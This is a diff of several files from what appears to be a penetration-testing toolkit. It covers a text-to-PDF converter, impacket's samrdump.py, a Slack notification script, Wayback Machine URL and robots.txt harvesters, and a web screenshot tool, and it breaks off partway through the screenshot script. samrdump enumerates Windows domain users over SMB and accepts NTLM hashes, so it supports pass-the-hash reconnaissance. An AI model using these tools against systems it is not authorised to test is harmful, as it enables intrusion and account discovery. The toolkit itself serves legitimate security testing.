parser.add_option('-s','--size',dest='fontsize',help='Use font at PTSIZE points (default=>10)',metavar='PTSIZE',default=10)
parser.add_option('-v','--linespace',dest='linespace',help='Use line spacing LINESPACE (deault 12)',metavar='LINESPACE',default=12)
parser.add_option('-l','--lines',dest='lines',help='Lines per page (default 60, determined automatically if unspecified)',default=60, metavar=None)
parser.add_option('-c','--chars',dest='chars',help='Maximum characters per line (default 80)',default=80,metavar=None)
parser.add_option('-t','--tab',dest='tabspace',help='Spaces per tab character (default 4)',default=4,metavar=None)
parser.add_option('-F','--ignoreff',dest='formfeed',help='Ignore formfeed character ^L (i.e, accept formfeed characters as pagebreaks)',default=False,action='store_true')
parser.add_option('-P','--papersize',dest='papersize',help='Set paper size (default is letter, accepted values are "A4" or "A3")')
parser.add_option('-W','--width',dest='width',help='Independent paper width in points',metavar=None,default=612)
parser.add_option('-H','--height',dest='height',help='Independent paper height in points',metavar=None,default=792)
parser.add_option('-2','--twocolumns',dest='twocolumns',help='Format as two columns',metavar=None,default=False,action='store_true')
parser.add_option('-L','--landscape',dest='landscape',help='Format in landscape mode',metavar=None,default=False,action='store_true')
parser.add_option('-R','--regexp',dest='pageregexp',help='Regular expression string to determine page breaks (if supplied, this will be used to split text into pages, instead of using line count)',metavar=None)
parser.add_option('-S','--subject',dest='subject',help='Optional subject for the document',metavar=None)
parser.add_option('-A','--author',dest='author',help='Optional author for the document',metavar=None)
parser.add_option('-K','--keywords',dest='keywords',help='Optional list of keywords for the document (separated by commas)',metavar=None)
optlist, args = parser.parse_args()
# print optlist.__dict__, args
if len(args)==0:
sys.exit('Error: input file argument missing')
elif len(args)>1:
sys.exit('Error: Too many arguments')
self._ifile = args[0]
d = optlist.__dict__
if d.get('isolatin'): self._IsoEnc=True
if d.get('formfeed'): self._doFFs = True
if d.get('twocolumns'): self._columns = 2
if d.get('landscape'): self._landscape = True
self._font = '/' + d.get('font')
psize = d.get('papersize')
if psize=='A4':
self._pageWd=595
self._pageHt=842
elif psize=='A3':
self._pageWd=842
self._pageHt=1190
fsize = int(d.get('fontsize'))
if fsize < 1: fsize = 1
self._ptSize = fsize
lspace = int(d.get('linespace'))
if lspace<1: lspace = 1
self._vertSpace = lspace
lines = int(d.get('lines'))
if lines<1: lines = 1
self._lines = int(lines)
chars = int(d.get('chars'))
if chars<4: chars = 4
self._cols = chars
tab = int(d.get('tabspace'))
if tab<1: tab = 1
self._tab = tab
w = int(d.get('width'))
if w<72: w=72
self._pageWd = w
h = int(d.get('height'))
if h<72: h=72
self._pageHt = h
# Very optional args
author = d.get('author')
if author: self._author = author
subject = d.get('subject')
if subject: self._subject = subject
keywords = d.get('keywords')
if keywords:
self._keywords = keywords.split(',')
pagebreak = d.get('pageregexp')
if pagebreak:
self._pagebreakre = re.compile(pagebreak, re.UNICODE|re.IGNORECASE)
outfile = d.get('outfile')
if outfile: self._ofile = outfile
if self._landscape:
print 'Landscape option on...'
if self._columns==2:
print 'Printing in two columns...'
if self._doFFs:
print 'Ignoring form feed character...'
if self._IsoEnc:
print 'Using ISO Latin Encoding...'
print 'Using font',self._font[1:],'size =', self._ptSize
def writestr(self, str):
""" Write string to output file descriptor.
All output operations go through this function.
We keep the current file position also here"""
# update current file position
self._fpos += len(str)
for x in range(0, len(str)):
if str[x] == '\n':
self._fpos += LF_EXTRA
try:
self._ofs.write(str)
except IOError, e:
print e
return -1
return 0
def convert(self):
""" Perform the actual conversion """
if self._landscape:
# swap page width & height
tmp = self._pageHt
self._pageHt = self._pageWd
self._pageWd = tmp
if self._lines==0:
self._lines = (self._pageHt - 72)/self._vertSpace
if self._lines < 1:
self._lines=1
try:
self._ifs=open(self._ifile)
except IOError, (strerror, errno):
print 'Error: Could not open file to read --->', self._ifile
sys.exit(3)
if self._ofile=="":
self._ofile = os.path.splitext(self._ifile)[0] + '.pdf'
try:
self._ofs = open(self._ofile, 'wb')
except IOError, (strerror, errno):
print 'Error: Could not open file to write --->', self._ofile
sys.exit(3)
print 'Input file=>',self._ifile
print 'Writing pdf file',self._ofile, '...'
self.writeheader()
self.writepages()
self.writerest()
print 'Wrote file', self._ofile
self._ifs.close()
self._ofs.close()
return 0
def writeheader(self):
"""Write the PDF header"""
ws = self.writestr
title = self._ifile
t=time.localtime()
timestr=str(time.strftime("D:%Y%m%d%H%M%S", t))
ws("%PDF-1.4\n")
self._locations[1] = self._fpos
ws("1 0 obj\n")
ws("<<\n")
buf = "".join(("/Creator (", self._appname, " By Anand B Pillai )\n"))
ws(buf)
buf = "".join(("/CreationDate (", timestr, ")\n"))
ws(buf)
buf = "".join(("/Producer (", self._appname, "(\\251 Anand B Pillai))\n"))
ws(buf)
if self._subject:
title = self._subject
buf = "".join(("/Subject (",self._subject,")\n"))
ws(buf)
if self._author:
buf = "".join(("/Author (",self._author,")\n"))
ws(buf)
if self._keywords:
buf = "".join(("/Keywords (",' '.join(self._keywords),")\n"))
ws(buf)
if title:
buf = "".join(("/Title (", title, ")\n"))
ws(buf)
ws(">>\n")
ws("endobj\n")
self._locations[2] = self._fpos
ws("2 0 obj\n")
ws("<<\n")
ws("/Type /Catalog\n")
ws("/Pages 3 0 R\n")
ws(">>\n")
ws("endobj\n")
self._locations[4] = self._fpos
ws("4 0 obj\n")
ws("<<\n")
buf = "".join(("/BaseFont ", str(self._font), " /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font >>\n"))
ws(buf)
if self._IsoEnc:
ws(ENCODING_STR)
ws(">>\n")
ws("endobj\n")
self._locations[5] = self._fpos
ws("5 0 obj\n")
ws("<<\n")
ws(" /Font << /F1 4 0 R >>\n")
ws(" /ProcSet [ /PDF /Text ]\n")
ws(">>\n")
ws("endobj\n")
def startpage(self):
""" Start a page of data """
ws = self.writestr
self._pageNo += 1
self._curobj += 1
self._locations.append(self._fpos)
self._locations[self._curobj]=self._fpos
self._pageObs.append(self._curobj)
self._pageObs[self._pageNo] = self._curobj
buf = "".join((str(self._curobj), " 0 obj\n"))
ws(buf)
ws("<<\n")
ws("/Type /Page\n")
ws("/Parent 3 0 R\n")
ws("/Resources 5 0 R\n")
self._curobj += 1
buf = "".join(("/Contents ", str(self._curobj), " 0 R\n"))
ws(buf)
ws(">>\n")
ws("endobj\n")
self._locations.append(self._fpos)
self._locations[self._curobj] = self._fpos
buf = "".join((str(self._curobj), " 0 obj\n"))
ws(buf)
ws("<<\n")
buf = "".join(("/Length ", str(self._curobj + 1), " 0 R\n"))
ws(buf)
ws(">>\n")
ws("stream\n")
strmPos = self._fpos
ws("BT\n");
buf = "".join(("/F1 ", str(self._ptSize), " Tf\n"))
ws(buf)
buf = "".join(("1 0 0 1 50 ", str(self._pageHt - 40), " Tm\n"))
ws(buf)
buf = "".join((str(self._vertSpace), " TL\n"))
ws(buf)
return strmPos
def endpage(self, streamStart):
"""End a page of data """
ws = self.writestr
ws("ET\n")
streamEnd = self._fpos
ws("endstream\n")
ws("endobj\n")
self._curobj += 1
self._locations.append(self._fpos)
self._locations[self._curobj] = self._fpos
buf = "".join((str(self._curobj), " 0 obj\n"))
ws(buf)
buf = "".join((str(streamEnd - streamStart), '\n'))
ws(buf)
ws('endobj\n')
def writepages(self):
"""Write pages as PDF"""
ws = self.writestr
beginstream=0
lineNo, charNo=0,0
ch, column=0,0
padding,i=0,0
atEOF=0
linebuf = ''
while not atEOF:
beginstream = self.startpage()
column=1
while column <= self._columns:
column += 1
atFF=0
atBOP=0
lineNo=0
# Special flag for regexp page break
pagebreak = False
while lineNo < self._lines and not atFF and not atEOF and not pagebreak:
linebuf = ''
lineNo += 1
ws("(")
charNo=0
while charNo < self._cols:
charNo += 1
ch = self._ifs.read(1)
cond = ((ch != '\n') and not(ch==FF and self._doFFs) and (ch != ''))
if not cond:
# See if this dude matches the pagebreak regexp
if self._pagebreakre and self._pagebreakre.search(linebuf.strip()):
pagebreak = True
linebuf = ''
break
else:
linebuf = linebuf + ch
if ord(ch) >= 32 and ord(ch) <= 127:
if ch == '(' or ch == ')' or ch == '\\':
ws("\\")
ws(ch)
else:
if ord(ch) == 9:
padding =self._tab - ((charNo - 1) % self._tab)
for i in range(padding):
ws(" ")
charNo += (padding -1)
else:
if ch != FF:
# write \xxx form for dodgy character
buf = "".join(('\\', ch))
ws(buf)
else:
# dont print anything for a FF
charNo -= 1
ws(")'\n")
if ch == FF:
atFF=1
if lineNo == self._lines:
atBOP=1
if atBOP:
pos=0
ch = self._ifs.read(1)
pos= self._ifs.tell()
if ch == FF:
ch = self._ifs.read(1)
pos=self._ifs.tell()
# python's EOF signature
if ch == '':
atEOF=1
else:
# push position back by one char
self._ifs.seek(pos-1)
elif atFF:
ch = self._ifs.read(1)
pos=self._ifs.tell()
if ch == '':
atEOF=1
else:
self._ifs.seek(pos-1)
if column < self._columns:
buf = "".join(("1 0 0 1 ",
str((self._pageWd/2 + 25)),
" ",
str(self._pageHt - 40),
" Tm\n"))
ws(buf)
self.endpage(beginstream)
def writerest(self):
"""Finish the file"""
ws = self.writestr
self._locations[3] = self._fpos
ws("3 0 obj\n")
ws("<<\n")
ws("/Type /Pages\n")
buf = "".join(("/Count ", str(self._pageNo), "\n"))
ws(buf)
buf = "".join(("/MediaBox [ 0 0 ", str(self._pageWd), " ", str(self._pageHt), " ]\n"))
ws(buf)
ws("/Kids [ ")
for i in range(1, self._pageNo+1):
buf = "".join((str(self._pageObs[i]), " 0 R "))
ws(buf)
ws("]\n")
ws(">>\n")
ws("endobj\n")
xref = self._fpos
ws("xref\n")
buf = "".join(("0 ", str((self._curobj) + 1), "\n"))
ws(buf)
buf = "".join(("0000000000 65535 f ", str(LINE_END)))
ws(buf)
for i in range(1, self._curobj + 1):
val = self._locations[i]
buf = "".join((string.zfill(str(val), 10), " 00000 n ", str(LINE_END)))
ws(buf)
ws("trailer\n")
ws("<<\n")
buf = "".join(("/Size ", str(self._curobj + 1), "\n"))
ws(buf)
ws("/Root 2 0 R\n")
ws("/Info 1 0 R\n")
ws(">>\n")
ws("startxref\n")
buf = "".join((str(xref), "\n"))
ws(buf)
ws("%%EOF\n")
def main():
pdfclass=PyText2Pdf()
pdfclass.parse_args()
pdfclass.convert()
if __name__ == "__main__":
main()

2
bin/report.py Normal file
View File

@@ -0,0 +1,2 @@
import pdfkit
pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf')

201
bin/samrdump.py Normal file
View File

@@ -0,0 +1,201 @@
#!/usr/bin/python
# Copyright (c) 2003-2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: DCE/RPC SAMR dumper.
#
# Author:
# Javier Kohen <jkohen@coresecurity.com>
# Alberto Solino (@agsolino)
#
# Reference for:
# DCE/RPC for SAMR
import sys
import logging
import argparse
from impacket.examples import logger
from impacket import version
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5.rpcrt import DCERPCException
class ListUsersException(Exception):
pass
class SAMRDump:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
}
def __init__(self, protocols = None,
username = '', password = '', domain = '', hashes = None, aesKey=None, doKerberos = False):
if not protocols:
self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
else:
self.__protocols = [protocols]
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def dump(self, addr):
"""Dumps the list of users and shares registered present at
addr. Addr is a valid host name or IP address.
"""
logging.info('Retrieving endpoint list from %s' % addr)
# Try all requested protocols until one works.
entries = []
for protocol in self.__protocols:
protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
try:
entries = self.__fetchList(rpctransport)
except Exception, e:
logging.critical(str(e))
else:
# Got a response. No need for further iterations.
break
# Display results.
for entry in entries:
(username, uid, user) = entry
base = "%s (%d)" % (username, uid)
print base + '/FullName:', user['FullName']
print base + '/UserComment:', user['UserComment']
print base + '/PrimaryGroupId:', user['PrimaryGroupId']
print base + '/BadPasswordCount:', user['BadPasswordCount']
print base + '/LogonCount:', user['LogonCount']
if entries:
num = len(entries)
if 1 == num:
logging.info('Received one entry.')
else:
logging.info('Received %d entries.' % num)
else:
logging.info('No entries received.')
def __fetchList(self, rpctransport):
dce = rpctransport.get_dce_rpc()
entries = []
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
print 'Found domain(s):'
for domain in domains:
print " . %s" % domain['Name']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext = enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user['RelativeId'])
print "Found user: %s, uid = %d" % (user['Name'], user['RelativeId'] )
info = samr.hSamrQueryInformationUser2(dce, r['UserHandle'],samr.USER_INFORMATION_CLASS.UserAllInformation)
entry = (user['Name'], user['RelativeId'], info['Buffer']['All'])
entries.append(entry)
samr.hSamrCloseHandle(dce, r['UserHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except ListUsersException, e:
logging.critical("Error listing users: %s" % e)
dce.disconnect()
return entries
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "This script downloads the list of users for the target system.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
if domain is None:
domain = ''
if options.aesKey is not None:
options.k = True
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
dumper = SAMRDump(options.protocol, username, password, domain, options.hashes, options.aesKey, options.k)
dumper.dump(address)

17
bin/slack.sh Normal file
View File

@@ -0,0 +1,17 @@
#!/bin/bash
# Slack API Integration script for Sn1per
# By @xer0dayz - https://sn1persecurity.com
#
source /usr/share/sniper/sniper.conf 2> /dev/null
source /root/.sniper.conf 2> /dev/null
source /root/.sniper_api_keys.conf 2> /dev/null
MESSAGE="$1"
if [ "$MESSAGE" == "postfile" ]; then
FILENAME="$2"
curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null
else
curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$MESSAGE\"}" $SLACK_WEBHOOK_URL 2> /dev/null > /dev/null
fi

47
bin/waybackrobots.py Normal file
View File

@@ -0,0 +1,47 @@
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
results = r.json()
if len(results) == 0: # might find nothing
return []
results.pop(0) # The first item is ['timestamp', 'original']
return results
def getpaths(snapshot):
url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1])
robotstext = requests.get(url).text
if 'Disallow:' in robotstext: # verify it's acually a robots.txt file, not 404 page
paths = re.findall('/.*', robotstext)
return paths
return []
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage:\n\tpython3 waybackrobots.py <domain-name>')
sys.exit()
host = sys.argv[1]
snapshots = robots(host)
print('Found %s unique results' % len(snapshots))
if len(snapshots) == 0:
sys.exit()
print('This may take some time...')
pool = Pool(4)
paths = pool.map(getpaths, snapshots)
unique_paths = set()
for i in paths:
unique_paths.update(i)
filename = '%s-robots.txt' % host
with open(filename, 'w') as f:
f.write('\n'.join(unique_paths))
print('[*] Saved results to %s' % filename)

35
bin/waybackurls.py Normal file
View File

@@ -0,0 +1,35 @@
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
r = requests.get(url)
results = r.json()
return results[1:]
if __name__ == '__main__':
argc = len(sys.argv)
if argc < 2:
print('Usage:\n\tpython3 waybackurls.py <url> <include_subdomains:optional>')
sys.exit()
host = sys.argv[1]
with_subs = False
if argc > 3:
with_subs = True
urls = waybackurls(host, with_subs)
json_urls = json.dumps(urls)
if urls:
filename = '%s-waybackurls.json' % host
with open(filename, 'w') as f:
f.write(json_urls)
print('[*] Saved results to %s' % filename)
else:
print('[-] Found nothing')

168
bin/webscreenshot.js Normal file
View File

@@ -0,0 +1,168 @@
/***
# This file is part of webscreenshot.
#
# Copyright (C) 2014, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
***/
var Page = (function(custom_headers, http_username, http_password) {
var opts = {
width: 1200,
height: 800,
ajaxTimeout: 400,
maxTimeout: 800,
httpAuthErrorCode: 2
};
var requestCount = 0;
var forceRenderTimeout;
var ajaxRenderTimeout;
var page = require('webpage').create();
page.viewportSize = {
width: opts.width,
height: opts.height
};
page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36';
page.settings.userName = http_username;
page.settings.password = http_password;
page.customHeaders = custom_headers;
page.onInitialized = function() {
page.customHeaders = {};
};
// Silence confirmation messages and errors
page.onConfirm = page.onPrompt = page.onError = noop;
page.onResourceRequested = function(request) {
requestCount += 1;
clearTimeout(ajaxRenderTimeout);
};
page.onResourceReceived = function(response) {
if (response.stage && response.stage == 'end' && response.status == '401') {
page.failReason = '401';
}
if (!response.stage || response.stage === 'end') {
requestCount -= 1;
if (requestCount === 0) {
ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout);
}
}
};
var api = {};
api.render = function(url, file) {
opts.file = file;
page.open(url, function(status) {
if (status !== "success") {
if (page.failReason && page.failReason == '401') {
// Specific 401 HTTP code hint
phantom.exit(opts.httpAuthErrorCode);
} else {
// All other failures
phantom.exit(1);
}
} else {
forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout);
}
});
};
function renderAndExit() {
// Trick to avoid transparent background
page.evaluate(function() {
document.body.bgColor = 'white';
});
page.render(opts.file);
phantom.exit(0);
}
function noop() {}
return api;
});
function main() {
var system = require('system');
var p_url = new RegExp('url_capture=(.*)');
var p_outfile = new RegExp('output_file=(.*)');
var p_header = new RegExp('header=(.*)');
var p_http_username = new RegExp('http_username=(.*)');
var http_username = '';
var p_http_password = new RegExp('http_password=(.*)');
var http_password = '';
var temp_custom_headers = {
// Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930)
'Accept-Encoding': ' '
};
for(var i = 0; i < system.args.length; i++) {
if (p_url.test(system.args[i]) === true)
{
var URL = p_url.exec(system.args[i])[1];
}
if (p_outfile.test(system.args[i]) === true)
{
var output_file = p_outfile.exec(system.args[i])[1];
}
if (p_http_username.test(system.args[i]) === true)
{
http_username = p_http_username.exec(system.args[i])[1];
}
if (p_http_password.test(system.args[i]) === true)
{
http_password = p_http_password.exec(system.args[i])[1];
}
if (p_header.test(system.args[i]) === true)
{
var header = p_header.exec(system.args[i]);
var p_header_split = header[1].split(': ', 2);
var header_name = p_header_split[0];
var header_value = p_header_split[1];
temp_custom_headers[header_name] = header_value;
}
}
if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) {
console.log("Usage: phantomjs [options] webscreenshot.js url_capture=<URL> output_file=<output_file.png> [header=<custom header> http_username=<HTTP basic auth username> http_password=<HTTP basic auth password>]");
console.log('Please specify an URL to capture and an output png filename !');
phantom.exit(1);
}
else {
var page = Page(temp_custom_headers, http_username, http_password);
page.render(URL, output_file);
}
}
main();

432
bin/webscreenshot.py Normal file
View File

@@ -0,0 +1,432 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of webscreenshot.
#
# Copyright (C) 2018, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
import re
import os
import sys
import subprocess
import datetime
import time
import signal
import multiprocessing
import itertools
import shlex
import logging
import errno
# Script version
VERSION = '2.2.1'
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="usage: %prog [options] URL")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help = '<INPUT_FILE>: text file containing the target list. Ex: list.txt', nargs = 1)
main_grp.add_option('-o', '--output-directory', help = '<OUTPUT_DIRECTORY> (optional): screenshots output directory (default \'./screenshots/\')', nargs = 1)
main_grp.add_option('-r', '--renderer', help = '<RENDERER> (optional): renderer to use among \'phantomjs\' (legacy but best results), \'chrome\', \'chromium\' (version > 57) (default \'phantomjs\')', choices = ['phantomjs', 'chrome', 'chromium'], default = 'phantomjs', nargs = 1)
main_grp.add_option('-w', '--workers', help = '<WORKERS> (optional): number of parallel execution workers (default 2)', default = 2, nargs = 1)
main_grp.add_option('-v', '--verbosity', help = '<VERBOSITY> (optional): verbosity level, repeat it to increase the level { -v INFO, -vv DEBUG } (default verbosity ERROR)', action = 'count', default = 0)
proc_grp = OptionGroup(parser, 'Input processing parameters')
proc_grp.add_option('-p', '--port', help = '<PORT> (optional): use the specified port for each target in the input list. Ex: -p 80', nargs = 1)
proc_grp.add_option('-s', '--ssl', help = '<SSL> (optional): enforce ssl for every connection', action = 'store_true', default = False)
proc_grp.add_option('-m', '--multiprotocol', help = '<MULTIPROTOCOL> (optional): perform screenshots over HTTP and HTTPS for each target', action = 'store_true', default = False)
http_grp = OptionGroup(parser, 'HTTP parameters')
http_grp.add_option('-c', '--cookie', help = '<COOKIE_STRING> (optional): cookie string to add. Ex: -c "JSESSIONID=1234; YOLO=SWAG"', nargs = 1)
http_grp.add_option('-a', '--header', help = '<HEADER> (optional): custom or additional header. Repeat this option for every header. Ex: -a "Host: localhost" -a "Foo: bar"', action = 'append')
http_grp.add_option('-u', '--http-username', help = '<HTTP_USERNAME> (optional): specify a username for HTTP Basic Authentication.')
http_grp.add_option('-b', '--http-password', help = '<HTTP_PASSWORD> (optional): specify a password for HTTP Basic Authentication.')
conn_grp = OptionGroup(parser, 'Connection parameters')
conn_grp.add_option('-P', '--proxy', help = '<PROXY> (optional): specify a proxy. Ex: -P http://proxy.company.com:8080')
conn_grp.add_option('-A', '--proxy-auth', help = '<PROXY_AUTH> (optional): provides authentication information for the proxy. Ex: -A user:password')
conn_grp.add_option('-T', '--proxy-type', help = '<PROXY_TYPE> (optional): specifies the proxy type, "http" (default), "none" (disable completely), or "socks5". Ex: -T socks')
conn_grp.add_option('-t', '--timeout', help = '<TIMEOUT> (optional): renderer execution timeout in seconds (default 30 sec)', default = 30, nargs = 1)
parser.option_groups.extend([main_grp, proc_grp, http_grp, conn_grp])
# renderer binaries, hoping to find it in a $PATH directory
## Be free to change them to your own full-path location
PHANTOMJS_BIN = 'phantomjs'
CHROME_BIN = 'google-chrome'
CHROMIUM_BIN = 'chromium'
WEBSCREENSHOT_JS = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), './webscreenshot.js'))
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), './screenshots/'))
# Logger definition
LOGLEVELS = {0 : 'ERROR', 1 : 'INFO', 2 : 'DEBUG'}
logger_output = logging.StreamHandler(sys.stdout)
logger_output.setFormatter(logging.Formatter('[%(levelname)s][%(name)s] %(message)s'))
logger_gen = logging.getLogger("General")
logger_gen.addHandler(logger_output)
# Macros
SHELL_EXECUTION_OK = 0
SHELL_EXECUTION_ERROR = -1
PHANTOMJS_HTTP_AUTH_ERROR_CODE = 2
# Handful patterns
p_ipv4_elementary = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
p_domain = '[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,6}'
p_port = '\d{0,5}'
p_resource = '(?:/(?P<res>.*))?'
full_uri_domain = re.compile('^(?P<protocol>http(?:|s))://(?P<host>%s|%s)(?::(?P<port>%s))?%s$' % (p_domain, p_ipv4_elementary, p_port, p_resource))
fqdn_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s$' % (p_domain, p_port, p_resource))
fqdn_only = re.compile('^(?P<host>%s)%s$' % (p_domain, p_resource))
ipv4_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s' % (p_ipv4_elementary, p_port, p_resource))
ipv4_only = re.compile('^(?P<host>%s)%s$' % (p_ipv4_elementary, p_resource))
entry_from_csv = re.compile('^(?P<host>%s|%s)\s+(?P<port>\d+)$' % (p_domain, p_ipv4_elementary))
# Handful functions
def init_worker():
"""
Tell the workers to ignore a global SIGINT interruption
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def kill_em_all(signal, frame):
"""
Terminate all processes while capturing a SIGINT from the user
"""
logger_gen.info('CTRL-C received, exiting')
sys.exit(0)
def shell_exec(url, command, options):
"""
Execute a shell command following a timeout
Taken from http://howto.pui.ch/post/37471155682/set-timeout-for-a-shell-command-in-python
"""
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
logger_url = logging.getLogger("%s" % url)
logger_url.setLevel(options.log_level)
timeout = int(options.timeout)
start = datetime.datetime.now()
try :
p = subprocess.Popen(shlex.split(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# binaries timeout
while p.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
logger_url.debug("Shell command PID %s reached the timeout, killing it now" % p.pid)
logger_url.error("Screenshot somehow failed\n")
if sys.platform == 'win32':
p.send_signal(signal.SIGTERM)
else:
p.send_signal(signal.SIGKILL)
return SHELL_EXECUTION_ERROR
retval = p.poll()
if retval != SHELL_EXECUTION_OK:
if retval == PHANTOMJS_HTTP_AUTH_ERROR_CODE:
# HTTP Authentication request
logger_url.error("HTTP Authentication requested, try to pass credentials with -u and -b options")
else:
# Phantomjs general error
logger_url.error("Shell command PID %s returned an abnormal error code: '%s'" % (p.pid,retval))
logger_url.error("Screenshot somehow failed\n")
return SHELL_EXECUTION_ERROR
else:
# Phantomjs ok
logger_url.debug("Shell command PID %s ended normally" % p.pid)
logger_url.info("Screenshot OK\n")
return SHELL_EXECUTION_OK
except Exception as e:
if e.errno and e.errno == errno.ENOENT :
logger_url.error('renderer binary could not have been found in your current PATH environment variable, exiting')
else:
logger_gen.error('Unknown error: %s, exiting' % e )
return SHELL_EXECUTION_ERROR
def filter_bad_filename_chars(filename):
#print (filename)
"""
Filter bad chars for any filename
"""
# Before, just avoid triple underscore escape for the classic '://' pattern
filename = filename.replace('http://', '')
filename = filename.replace('https://', '')
#print (filename)
